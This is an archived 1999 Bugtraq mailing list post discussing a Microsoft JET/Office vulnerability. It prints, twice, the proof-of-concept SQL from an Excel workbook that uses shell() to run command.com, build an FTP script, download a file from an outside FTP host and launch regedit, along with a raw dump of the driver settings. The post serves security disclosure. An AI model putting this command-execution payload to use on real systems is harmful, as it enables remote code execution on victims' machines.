Bugtraq mailing list archives
Microsoft JET/Office Vulnerability Exploit
From: ollie () DELPHISPLC COM (Ollie Whitehouse)
Date: Thu, 19 Aug 1999 12:27:01 +0100
All, Russ Cooper:
Well, with the module password protected it seems clear you're not out to get that critique very quickly. Maybe if you'd let someone know the details we'd be able to answer you. As it is, we're simply left with what appears to be the same exploit.
Below is the code from the workbook:
[Code]
SELECT shell('command.com /C echo user anonymous
yeah () right com'+chr$(10)+'get .welcome c:\ftptest.txt'+chr$(10)+'quit >
c:\jexploit.log'), shell('command.com /C ftp -s:C:\jexploit.log -n
ftp.aol.c..D.A..om',1), shell('command.com /C regedit',1)..FROM config.sys
[RAW Dump from the workbook from the SF web site]
SELECT shell('command.com /C echo user anonymous
yeah () right com'+chr$(10)+'get .welcome c:\ftptest.txt'+chr$(10)+'quit >
c:\jexploit.log'), shell('command.com /C ftp -s:C:\jexploit.log -n
ftp.aol.c..D.A..om',1), shell('command.com /C regedit',1)..FROM config.sys
config.......DBQ=C:\;DefaultDir=C:\;Driver={Microsoft Text Driver (*.txt;
*.csv)};DriverId=27;Extensions=asc,csv,ini,tab,txt;FIL=text;Implic..}.z..itC
ommitSync=Yes;MaxBufferSize=512;MaxScanRows=25;PageTimeout=5;SafeTransaction
s=0;Threads=3;UID=admin;UserCommitSync=Yes
That will be enough information for people who want to create their own
working demo.
Ollie
<%
Ollie Whitehouse
I.T Co-Ordinator - Delphis Consulting
VOX: +44 (0)207 916 0200 (Switchboard)
FAX: +44 (0)207 916 1620 (Main)
FAX: +44 (0)870 0881837 (FAX - E-Mail)
PGP: http://www.ombs.demon.co.uk/pgp.txt
Tag: Who needs Windows2000 when you have OS/2?
%>
Current thread:
- Microsoft JET/Office Vulnerability Exploit Elias Levy (Aug 18)
- Re: Microsoft JET/Office Vulnerability Exploit Ben Greenbaum (Aug 18)
- Jet 3.51 Vul / Office 97 hexedit () POREIA COM (Aug 18)
- <Possible follow-ups>
- Re: Microsoft JET/Office Vulnerability Exploit Russ (Aug 18)
- Re: Microsoft JET/Office Vulnerability Exploit Elias Levy (Aug 18)
- Administrivia Elias Levy (Aug 18)
- Microsoft JET/Office Vulnerability Exploit Ollie Whitehouse (Aug 19)
- Re: Microsoft JET/Office Vulnerability Exploit Russ (Aug 19)
